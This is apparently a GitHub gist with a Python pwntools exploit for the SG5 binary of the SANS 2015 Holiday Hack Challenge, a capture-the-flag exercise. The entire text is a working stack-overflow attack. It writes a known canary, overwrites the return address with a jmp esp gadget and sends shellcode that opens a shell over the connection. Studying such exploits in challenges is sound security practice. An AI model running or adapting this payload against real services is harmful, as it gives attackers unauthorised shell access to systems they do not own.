@fragmede
Last active January 14, 2016 05:48
exploit for SG5 for SANS 2015 Holiday Hack Challenge

```python
from pwn import *

# Values specific to the SG5 challenge binary (as given in the gist).
canary = p32(0xe4ffffe4)      # stack canary value the binary uses
jmpesp = p32(0x0804936b)      # address of a `jmp esp` gadget, used as the return address
command = 'whoami; ls; pwd;'  # defined but not used below

r = remote('localhost', 4242)
r.recv()
r.sendline(b'X')
r.recvuntil(b'protected!\n')
r.recv()

# Payload layout: padding up to the canary slot, the canary itself, padding up
# to the saved return address, the gadget address, then the shellcode that
# execution lands on at esp. Offsets were located with pwntools' cyclic
# pattern (cyclic_find). Bytes literals keep this working on Python 2 and 3.
payload = b''
payload += b'A' * cyclic_find(b'bbaa')
payload += canary
payload += b'B' * cyclic_find(b'baaa')
payload += jmpesp
payload += asm(shellcraft.alarm(0))       # clear the binary's alarm timer
payload += asm(shellcraft.findpeersh())   # shell bound to the existing socket

log.info('sending shellcode')
r.sendline(payload)
r.interactive()
```